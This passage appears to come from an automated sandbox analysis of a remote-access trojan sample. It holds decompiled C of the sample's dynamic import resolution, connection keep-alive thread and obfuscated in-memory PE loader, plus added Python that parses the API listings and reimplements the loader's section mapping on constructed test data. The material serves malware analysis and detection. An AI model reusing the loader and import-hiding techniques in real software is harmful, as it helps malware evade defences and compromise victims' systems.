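                    The listing above shows the sample building its own import table at run time: every LoadLibraryA/GetModuleHandleA call is immediately followed by a GetProcAddress, and the argument column the decompiler prints after the DLL name is the symbol string that GetProcAddress pops next (the last pair resolves Shlwapi.dll export ordinal 0xC instead of a name). Two details worth noting from the C code: the second fallback tests the A slot (0x46bd2c) rather than the W slot it is about to overwrite, so the Kernel32 fallback for GetModuleFileNameExW only fires when the A lookup failed; and NtUnmapViewOfSection is resolved up front, which is the usual preparation for replacing a hollowed process image. The Python below is an added example, not part of the report or of the sample: it parses this listing format and reconstructs the dynamically resolved imports per DLL. The listing text is copied from the report as test input; the watchlist of injection-related APIs is the author's own assumption.

```python
import re
from collections import OrderedDict

# Constructed sample input: the "APIs" listing of E0040CD09 from this report,
# copied verbatim so the parser can be exercised offline.
API_LISTING = """
• LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
• GetProcAddress.KERNEL32(00000000), ref: 0040CD25
• GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
• GetProcAddress.KERNEL32(00000000), ref: 0040CD43
• LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
• GetProcAddress.KERNEL32(00000000), ref: 0040CD57
• GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
• GetProcAddress.KERNEL32(00000000), ref: 0040CD74
• LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
• GetProcAddress.KERNEL32(00000000), ref: 0040CD88
• LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
• GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
• GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
• GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
• GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
• GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
• GetProcAddress.KERNEL32(00000000), ref: 0040CE00
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
• GetProcAddress.KERNEL32(00000000), ref: 0040CE14
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
• GetProcAddress.KERNEL32(00000000), ref: 0040CE28
• LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
• GetProcAddress.KERNEL32(00000000), ref: 0040CE39
"""

# One bullet: "<Api>.<Module>(<args>), ref: <hex address>"
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
MODULE_GETTERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


def normalize_dll(name):
    """'Kernel32.dll', 'kernel32' and 'KERNEL32.DLL' all map to 'kernel32'."""
    name = name.strip().lower()
    return name[:-4] if name.endswith(".dll") else name


def parse_api_listing(text):
    """Yield (api, module, [args], ref) for each bullet that matches the format."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",") if a.strip()]
            yield m.group("api"), m.group("module"), args, int(m.group("ref"), 16)


def reconstruct_dynamic_imports(text):
    """Pair each LoadLibrary/GetModuleHandle with the GetProcAddress that follows it.

    The decompiler prints the stack slots after the DLL name, which is where the
    symbol string consumed by GetProcAddress sits. An 8-hex-digit 'name' is an
    import by ordinal (the value is the ordinal) and is rendered as '#<ordinal>'.
    Returns OrderedDict: dll -> [(symbol, address of the GetProcAddress call), ...]
    """
    imports = OrderedDict()
    pending = None
    for api, _module, args, ref in parse_api_listing(text):
        if api in MODULE_GETTERS and args:
            dll = normalize_dll(args[0])
            sym = args[1] if len(args) > 1 else None
            if sym is not None and re.fullmatch(r"[0-9A-Fa-f]{8}", sym):
                sym = "#%d" % int(sym, 16)
            pending = (dll, sym)
        elif api == "GetProcAddress" and pending:
            dll, sym = pending
            imports.setdefault(dll, []).append((sym, ref))
            pending = None
    return imports


# Analyst watchlist (assumption, not from the report): APIs whose run-time
# resolution deserves a second look in a sample already flagged for injection.
WATCHLIST = {"NtUnmapViewOfSection", "IsUserAnAdmin", "SetProcessDEPPolicy", "IsWow64Process"}


def watchlist_hits(imports):
    """Sorted list of watchlisted symbols present in the reconstructed table."""
    return sorted(sym for syms in imports.values() for sym, _ref in syms if sym in WATCHLIST)


if __name__ == "__main__":
    table = reconstruct_dynamic_imports(API_LISTING)
    for dll, syms in table.items():
        print(dll, ", ".join("%s@%08X" % (s, r) for s, r in syms))
    print("watchlist:", watchlist_hits(table))
```

                    The same parser works on any other "APIs" block in the report; functions that resolve through a stored pointer (no GetProcAddress visible) will not appear, so treat the result as a lower bound on the run-time import set.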

                    C-Code - Quality: 69%
                    			E00404E9A(void* __ecx, intOrPtr _a4, char _a8) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr _t66;
                    				void* _t68;
                    
                    				_t68 = __ecx;
                    				if( *((char*)(__ecx + 0x50)) != 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t66 = _a4;
                    				if(_a8 != 0) {
                    					__eflags =  *0x46bb03;
                    					if(__eflags != 0) {
                    						GetLocalTime( &_v20);
                    						_push(_v20.wMilliseconds & 0x0000ffff);
                    						_t50 = "%02i:%02i:%02i:%03i [Info] ";
                    						_push(_v20.wSecond & 0x0000ffff);
                    						_push(_v20.wMinute & 0x0000ffff);
                    						E0040482E(__eflags, E00401F95(E00405343(_t50,  &_v44, E00402084("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
                    						E00401FC7();
                    						E00401FC7();
                    						_push(_t66);
                    						_push(_v20.wMilliseconds & 0x0000ffff);
                    						_push(_v20.wSecond & 0x0000ffff);
                    						_push(_v20.wMinute & 0x0000ffff);
                    						E0040482E(__eflags, E00401F95(E00405343(_t50,  &_v68, E00402084(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
                    						E00401FC7();
                    						E00401FC7();
                    					}
                    				} else {
                    					 *((char*)(__ecx + 0x64)) = 1;
                    				}
                    				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
                    				 *((char*)(_t68 + 0x50)) = 1;
                    				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
                    				CreateThread(0, 0, E0040518A, _t68, 0, 0); // executed
                    				return 1;
                    			}










                    Instruction addresses (listing column, one per decompiled statement): 0x00404ea2 0x00404ea9 0x00404fa2 0x00000000 0x00404fa2 0x00404eb3 0x00404eb6 0x00404ec1 0x00404ec8 0x00404ed2 0x00404edf 0x00404ee4 0x00404ee9 0x00404eee 0x00404f12 0x00404f1d 0x00404f25 0x00404f31 0x00404f32 0x00404f37 0x00404f3c 0x00404f60 0x00404f6b 0x00404f73 0x00404f73 0x00404eb8 0x00404eb8 0x00404eb8 0x00404f78 0x00404f81 0x00404f95 0x00404f98 0x00000000

                    APIs
                    • GetLocalTime.KERNEL32(00000001,0046C238,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,004125B1), ref: 00404ED2
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C780,00000000), ref: 00404F85
                    • CreateThread.KERNELBASE(00000000,00000000,0040518A,?,00000000,00000000), ref: 00404F98
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                    • API String ID: 2532271599-119634454
                    • Opcode ID: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
                    • Instruction ID: 5fa9d90cb8be4f3930b06c8b0122489401ffe22f77aad5cdb7e0e5ab13402fbc
                    • Opcode Fuzzy Hash: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
                    • Instruction Fuzzy Hash: 833194A1800255BACB10FBA6CC09DBFBBBCAF95709F04046FF941A21D2EA7C9945D764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                      • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                      • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                    • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                    • ExitProcess.KERNEL32 ref: 0040D1DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 3.2.1 Pro$override$pth_unenc
                    • API String ID: 2281282204-2083519672
                    • Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                    • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                    • Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                    • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                    • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                    • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                    • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                    • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                    Uniqueness

                    Uniqueness Score: -1.00%
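                    The decompiled function E105910CA that follows is a manual PE mapper (the stage that places the RAT image into memory). Reading it: the first loop decrypts a 0x72a84-byte blob in place; DLL and API names are then spelled as little-endian DWORD immediates pushed on the stack (0x6e72656b 0x32336c65 0x6c6c642e is "kernel32.dll", 0x74726956 0x416c6175 0x636f6c6c is "VirtualAlloc") and handed to the two resolver callbacks passed in _a8 and _a12, which yields VirtualAlloc, VirtualProtect, VirtualQuery and IsBadReadPtr; the loader reads ImageBase (e_lfanew+0x34) and SizeOfImage (e_lfanew+0x50), allocates that range with MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE (0x3000, 0x40), copies SizeOfHeaders (e_lfanew+0x54) bytes, then walks the 40-byte section headers starting at e_lfanew+0xf8 copying SizeOfRawData bytes from PointerToRawData to VirtualAddress; relocation handling is skipped when the allocation landed at the preferred base (_v16 - _v8 == 0), after which it reaches the PEB through fs:[0x30] (ImageBaseAddress at +0x8, Ldr at +0xc) and walks the module list. The Python below is an added example and not code from the report or from the sample: it decodes the pushed DWORD strings and repeats the header/section mapping over a constructed minimal PE32 image. The builder, the field offsets it writes and the two sample sections are the author's construction; the mapper reads exactly the fields the decompilation does.

```python
import struct


def decode_pushed_dwords(*dwords):
    """Decode DWORD immediates pushed to spell an ASCII string on the stack.

    Each value is little-endian, so 0x6e72656b is the bytes 'k','e','r','n'.
    The string ends at the first NUL; a short tail such as 0x7463 ('ct') packs
    to 'ct\\0\\0' and therefore terminates it.
    """
    raw = b"".join(struct.pack("<I", d) for d in dwords)
    return raw.split(b"\0", 1)[0].decode("ascii")


def align(value, boundary):
    return (value + boundary - 1) // boundary * boundary


def build_minimal_pe(sections, image_base=0x400000, file_align=0x200, sect_align=0x1000):
    """Construct a minimal PE32 image (constructed test data, not a real binary).

    sections: list of (name, rva, raw_bytes). Only fields the mapper consumes are
    meaningful: e_lfanew, NumberOfSections, ImageBase, SizeOfImage, SizeOfHeaders
    and the IMAGE_SECTION_HEADER array (which starts at e_lfanew + 0xF8 for PE32).
    """
    nt_off = 0x40                       # NT headers directly after the DOS header
    sh_off = nt_off + 0xF8              # 4 (sig) + 20 (file hdr) + 224 (opt hdr)
    size_of_headers = align(sh_off + 40 * len(sections), file_align)
    raw_ptr, size_of_image, sect_hdrs, blobs = size_of_headers, sect_align, b"", []
    for name, rva, data in sections:
        raw_size = align(len(data), file_align)
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                                 len(data), rva, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs.append((raw_ptr, data))
        raw_ptr += raw_size
        size_of_image = max(size_of_image, align(rva + len(data), sect_align))
    image = bytearray(raw_ptr)
    image[0:2] = b"MZ"
    image[0x3C:0x40] = struct.pack("<I", nt_off)
    image[nt_off:nt_off + 4] = b"PE\0\0"
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, ..., SizeOfOptionalHeader, Characteristics
    image[nt_off + 4:nt_off + 24] = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    opt[0:2] = struct.pack("<H", 0x10B)                  # PE32 magic
    opt[0x1C:0x20] = struct.pack("<I", image_base)       # ImageBase  (nt + 0x34)
    opt[0x20:0x24] = struct.pack("<I", sect_align)
    opt[0x24:0x28] = struct.pack("<I", file_align)
    opt[0x38:0x3C] = struct.pack("<I", size_of_image)    # SizeOfImage   (nt + 0x50)
    opt[0x3C:0x40] = struct.pack("<I", size_of_headers)  # SizeOfHeaders (nt + 0x54)
    image[nt_off + 24:nt_off + 248] = opt
    image[sh_off:sh_off + len(sect_hdrs)] = sect_hdrs
    for ptr, data in blobs:
        image[ptr:ptr + len(data)] = data
    return bytes(image)


def map_sections(image, new_base=None):
    """Map a PE file image the way E105910CA does.

    Copies SizeOfHeaders bytes, then for every section with a non-zero
    PointerToRawData copies SizeOfRawData bytes to VirtualAddress. Returns
    (mapped_image, delta, image_base); delta is new_base - ImageBase, which the
    loader uses to decide whether relocations must be applied at all.
    """
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    nsect, = struct.unpack_from("<H", image, e_lfanew + 6)
    image_base, = struct.unpack_from("<I", image, e_lfanew + 0x34)
    size_of_image, = struct.unpack_from("<I", image, e_lfanew + 0x50)
    size_of_headers, = struct.unpack_from("<I", image, e_lfanew + 0x54)
    if size_of_headers > len(image) or size_of_headers > size_of_image:
        raise ValueError("SizeOfHeaders exceeds file or image size")
    mapped = bytearray(size_of_image)
    mapped[:size_of_headers] = image[:size_of_headers]
    for i in range(nsect):
        _vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, e_lfanew + 0xF8 + 40 * i + 8)
        if not raw_ptr:
            continue                                     # uninitialised (.bss-like) section
        chunk = image[raw_ptr:raw_ptr + raw_size]
        if va + len(chunk) > len(mapped):
            raise ValueError("section %d overruns SizeOfImage" % i)  # the sample does not check this
        mapped[va:va + len(chunk)] = chunk
    delta = (image_base if new_base is None else new_base) - image_base
    return bytes(mapped), delta, image_base


if __name__ == "__main__":
    print(decode_pushed_dwords(0x6E72656B, 0x32336C65, 0x6C6C642E, 0))
    pe = build_minimal_pe([(".text", 0x1000, b"\xC3" * 16), (".data", 0x2000, b"hello")])
    mapped, delta, base = map_sections(pe, new_base=0x10000000)
    print("ImageBase=%#x delta=%#x mapped=%#x bytes" % (base, delta, len(mapped)))
```

                    The same decode_pushed_dwords call turns the remaining immediates in the function (0x506c6175 0x65746f72 0x7463, 0x516c6175 0x79726575, 0x61427349 0x61655264 0x72745064) into VirtualProtect, VirtualQuery and IsBadReadPtr, which is a quick way to confirm a loader's API set without running it. For a real capture, hand map_sections the decrypted blob and compare the section headers against the dumped memory region reported under the Yara matches.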

                    C-Code - Quality: 16%
                    			E105910CA(signed int __eax, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                    				void* _v8;
                    				long _v12;
                    				void* _v16;
                    				char _v60;
                    				intOrPtr* _v64;
                    				signed int* _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				signed int _v84;
                    				intOrPtr* _v116;
                    				struct HINSTANCE__* _v120;
                    				struct HINSTANCE__* _v124;
                    				struct HINSTANCE__* _v128;
                    				char _v136;
                    				char _v140;
                    				intOrPtr _v148;
                    				char _v160;
                    				intOrPtr _v380;
                    				intOrPtr _v428;
                    				intOrPtr _v468;
                    				char _v508;
                    				void* __ebp;
                    				signed int _t111;
                    				void* _t114;
                    				struct HINSTANCE__* _t116;
                    				void* _t121;
                    				void* _t122;
                    				void* _t127;
                    				intOrPtr _t129;
                    				intOrPtr* _t131;
                    				void* _t134;
                    				void* _t138;
                    				void* _t142;
                    				intOrPtr _t146;
                    				void* _t151;
                    				unsigned int _t153;
                    				void* _t155;
                    				void* _t156;
                    				unsigned int _t158;
                    				struct HINSTANCE__* _t161;
                    				intOrPtr _t162;
                    				intOrPtr* _t163;
                    				intOrPtr* _t164;
                    				intOrPtr _t167;
                    				intOrPtr* _t168;
                    				signed int _t190;
                    				signed int _t200;
                    				long _t202;
                    				void* _t203;
                    				signed int _t208;
                    				void* _t210;
                    				intOrPtr _t214;
                    				void* _t224;
                    				intOrPtr* _t225;
                    				intOrPtr _t226;
                    				unsigned int _t228;
                    				intOrPtr _t231;
                    				void* _t232;
                    				signed int _t233;
                    				signed int _t236;
                    				signed int _t242;
                    				signed int _t244;
                    				signed int _t245;
                    				void* _t249;
                    				void* _t250;
                    				void* _t253;
                    				void* _t257;
                    				void* _t260;
                    				intOrPtr _t263;
                    				void* _t264;
                    				void* _t265;
                    				struct HINSTANCE__* _t267;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				intOrPtr* _t281;
                    				intOrPtr* _t283;
                    				void* _t284;
                    				intOrPtr* _t287;
                    				void* _t290;
                    				void* _t291;
                    				void* _t292;
                    				void* _t293;
                    				void* _t294;
                    				void* _t295;
                    				void* _t296;
                    				void* _t297;
                    
                    				_v84 = __eax & 0xffff0000;
                    				_push(_a4);
                    				_pop(_t224);
                    				_t225 = _t224 + 0x72a84;
                    				_t111 = 0x72a84;
                    				_t242 = 0x1cf51641;
                    				do {
                    					_t111 = _t111 - 4;
                    					_t225 = _t225 - 4;
                    					asm("bswap ecx");
                    					_t244 = _t242 - 0x584ddde1;
                    					asm("bswap ecx");
                    					asm("ror ecx, 0xb5");
                    					asm("rol ecx, 0x36");
                    					_t245 = _t244 - 0x39568f98;
                    					_t190 =  !((( ~(( *_t225 + _t242 + _t111 - 0x77996225 + _t111 ^ 0xd7e05cc3) + _t111 - _t244) + _t244 ^ _t244) + _t244 + _t244 ^ _t244 ^ 0x834971f6 ^ _t245) - _t111 + _t111 ^ 0xffffffff8f6e950c);
                    					asm("ror ecx, 0x32");
                    					_t242 = _t245 + 0x40300c3a;
                    					asm("ror ecx, 0x51");
                    					asm("ror ecx, 0xe5");
                    					asm("bswap ecx");
                    					 *_t225 = ( ~( !((_t190 ^ _t111) + _t111 - 0x69f11a42) ^ _t242) ^ 0x660e251d) - 0x8be7802a;
                    				} while (_t111 != 0);
                    				E105914FA(_t111);
                    				_t114 =  *_a12(_t290, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
                    				_t291 = _t290 + 0x10;
                    				_t249 = _t114;
                    				_t116 =  *_a8(_t114, _t291, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
                    				_t292 = _t291 + 0x10;
                    				_t161 = _t116;
                    				if(_t116 == 0) {
                    					L62:
                    					return _t116;
                    				}
                    				_t116 =  *_a8(_t249, _t292, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
                    				_t293 = _t292 + 0x10;
                    				_v120 = _t116;
                    				if(_t116 == 0) {
                    					goto L62;
                    				}
                    				_t116 =  *_a8(_t249, _t293, 0x74726956, 0x516c6175, 0x79726575, 0);
                    				_t294 = _t293 + 0x10;
                    				_v124 = _t116;
                    				if(_t116 == 0) {
                    					goto L62;
                    				}
                    				_t116 =  *_a8(_t249, _t294, 0x61427349, 0x61655264, 0x72745064, 0);
                    				_t295 = _t294 + 0x10;
                    				_v128 = _t116;
                    				if(_t116 == 0) {
                    					goto L62;
                    				}
                    				_t250 =  &_v508;
                    				_t200 = 0x3e;
                    				memcpy(_t250, _a4 +  *((intOrPtr*)(_a4 + 0x3c)), _t200 << 2);
                    				_t296 = _t295 + 0xc;
                    				_t253 = _t250;
                    				_t121 =  *(_t253 + 0x34);
                    				_v8 = _t121;
                    				_t202 =  *(_t253 + 0x50);
                    				_v12 = _t202;
                    				_t122 = VirtualAlloc(_t121, _t202, 0x3000, 0x40); // executed
                    				_t203 = _t202;
                    				if(_t122 != 0) {
                    					L8:
                    					_v16 = _t122;
                    					_t277 = _a4;
                    					memcpy(_t122, _t277,  *(_t277 +  *((intOrPtr*)(_t277 + 0x3c)) + 0x54));
                    					_t297 = _t296 + 0xc;
                    					_t278 = _t277;
                    					_t280 = _t278 +  *((intOrPtr*)(_t278 + 0x3c)) + 0xf8;
                    					do {
                    						_t257 =  &_v60;
                    						_t208 = 0xa;
                    						_t127 = memcpy(_t257, _t280, _t208 << 2);
                    						_t297 = _t297 + 0xc;
                    						_t260 = _t257;
                    						_t226 =  *((intOrPtr*)(_t260 + 0x14));
                    						if(_t226 != 0) {
                    							_t127 = memcpy(_v16 +  *((intOrPtr*)(_t260 + 0xc)), _a4 + _t226,  *(_t260 + 0x10));
                    							_t297 = _t297 + 0xc;
                    							_t280 = _t280;
                    						}
                    					} while (_t127 != 1);
                    					_t228 = _v16 - _v8;
                    					if(_t228 == 0) {
                    						L24:
                    						_t210 = _v16;
                    						_v80 = _v80 + _v84;
                    						_t129 =  *[fs:0x30];
                    						if(_v72 == 0) {
                    							 *((intOrPtr*)(_t129 + 8)) = _t210;
                    						}
                    						_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0xc)) + 0xc));
                    						_t281 = _t131;
                    						while( *((intOrPtr*)(_t131 + 0x18)) != _v84 ||  *((intOrPtr*)(_t131 + 0x1c)) != _v80 ||  *((intOrPtr*)(_t131 + 0x20)) != _v76) {
                    							if( *_t131 == _t281) {
                    								L33:
                    								_t162 = _v380;
                    								if(_t162 == 0) {
                    									L46:
                    									_t163 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                    									_v116 = _t163;
                    									do {
                    										_t231 =  *((intOrPtr*)(_t163 + 0x18));
                    										if(_t231 == _v84) {
                    											goto L60;
                    										}
                    										_t134 = _v128(4, _t231);
                    										_t232 = _t231;
                    										if(_t134 != 0) {
                    											goto L60;
                    										}
                    										_t263 =  *((intOrPtr*)(_t232 +  *((intOrPtr*)(_t232 + 0x3c)) + 0x80));
                    										if(_t263 == 0) {
                    											goto L60;
                    										}
                    										_t264 = _t263 + _t232;
                    										while(1) {
                    											_push(_t264);
                    											asm("repe scasd");
                    											_t265 = 5;
                    											if(0 == 0) {
                    												goto L60;
                    											}
                    											_t283 =  *((intOrPtr*)(_t265 + 0x10)) +  *((intOrPtr*)(_t163 + 0x18));
                    											_t138 =  *_t283 - _v84;
                    											if(_t138 < 0 || _t138 > _v76) {
                    												L54:
                    												_t264 = _t265 + 0x14;
                    												continue;
                    											} else {
                    												_v124(_t283,  &_v160, 0x1c);
                    												_t142 = _v120(_v160, _v148, 4,  &_v140);
                    												if(_t142 == 0) {
                    													goto L60;
                    												}
                    												_push(_t265);
                    												while(1) {
                    													asm("lodsd");
                    													if(_t142 == 0) {
                    														break;
                    													}
                    													_t142 = _t142 - _v84 + _v16;
                    													asm("stosd");
                    												}
                    												_v120(_v160, _v148, _v140,  &_v136);
                    												_pop(_t265);
                    												goto L54;
                    											}
                    										}
                    										L60:
                    										_t163 =  *_t163;
                    									} while (_t163 != _v116);
                    									_t116 = _v468 + _v16;
                    									goto L62;
                    								}
                    								_t284 = _v16;
                    								_t164 = _t162 + _t284;
                    								while(1) {
                    									_t146 =  *((intOrPtr*)(_t164 + 0xc));
                    									if(_t146 == 0) {
                    										goto L46;
                    									}
                    									_v64 =  *((intOrPtr*)(_t164 + 0x10)) + _t284;
                    									_t214 =  *_t164;
                    									if(_t214 == 0) {
                    										_t214 =  *((intOrPtr*)(_t164 + 0x10));
                    									}
                    									_v68 = _t214 + _t284;
                    									_t116 = LoadLibraryA(_t146 + _t284); // executed
                    									if(_t116 == 0) {
                    										goto L62;
                    									} else {
                    										_t267 = _t116;
                    										while(1) {
                    											_t233 =  *_v68;
                    											if(_t233 == 0) {
                    												break;
                    											}
                    											if((_t233 & 0x80000000) == 0) {
                    												_t236 = _t233 + _t284 + 2;
                    											} else {
                    												_t236 = _t233 & 0x7fffffff;
                    											}
                    											 *_v64 =  *_a8(_t267, _t236);
                    											_v64 = _v64 + 4;
                    											_v68 =  &(_v68[1]);
                    										}
                    										_t164 = _t164 + 0x14;
                    										continue;
                    									}
                    								}
                    								goto L46;
                    							}
                    							_t131 =  *_t131;
                    						}
                    						 *((intOrPtr*)(_t131 + 0x18)) = _t210;
                    						 *((intOrPtr*)(_t131 + 0x1c)) = _t210 + _v468;
                    						 *((intOrPtr*)(_t131 + 0x20)) = _v428;
                    						goto L33;
                    					}
                    					_t151 = _v16;
                    					_t167 =  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t151 + 0x3c)) + 0xa0));
                    					if(_t167 == 0) {
                    						goto L24;
                    					}
                    					_t168 = _t167 + _t151;
                    					while( *((intOrPtr*)(_t168 + 4)) != 0) {
                    						_t153 =  *(_t168 + 8) & 0x0000ffff;
                    						_t287 = _v16 +  *_t168 + (_t153 & 0x00000fff);
                    						_t228 = _t228;
                    						_t155 = (_t153 >> 0xc) - 1;
                    						if(_t155 != 0) {
                    							_t156 = _t155 - 1;
                    							if(_t156 != 0) {
                    								if(_t156 == 1) {
                    									 *_t287 =  *_t287 + _t228;
                    								}
                    								L23:
                    								asm("loop 0xffffffce");
                    								_t168 = _t168 +  *((intOrPtr*)(_t168 + 4));
                    								continue;
                    							}
                    							_t158 = _t228 & 0x0000ffff;
                    							L20:
                    							 *_t287 =  *_t287 + _t158;
                    							goto L23;
                    						}
                    						_t158 = _t228 >> 0x10;
                    						goto L20;
                    					}
                    					goto L24;
                    				}
                    				_t116 = _t161->i(_t122, _t203, 0x1000, 0x40);
                    				if(_t116 == 0) {
                    					goto L62;
                    				}
                    				goto L8;
                    			}

                    APIs
                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 10591289
                    • LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105913E0
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocLibraryLoadVirtual
                    • String ID:
                    • API String ID: 3550616410-0
                    • Opcode ID: 91612ef8628ab45ef9bd95fb15bbb0cb87fa6bd3e56b60e267764787eebbf80b
                    • Instruction ID: e925c2e85578e2ed750717b7fb8f1fa13ee47476d884b96456065fc843aa7c24
                    • Opcode Fuzzy Hash: 91612ef8628ab45ef9bd95fb15bbb0cb87fa6bd3e56b60e267764787eebbf80b
                    • Instruction Fuzzy Hash: CBD1AF71A00215AFDF58CF69CC84BAEBBB5FF84350F15816DE809AB695DB30E901CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                    • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Name$ComputerUser
                    • String ID:
                    • API String ID: 4229901323-0
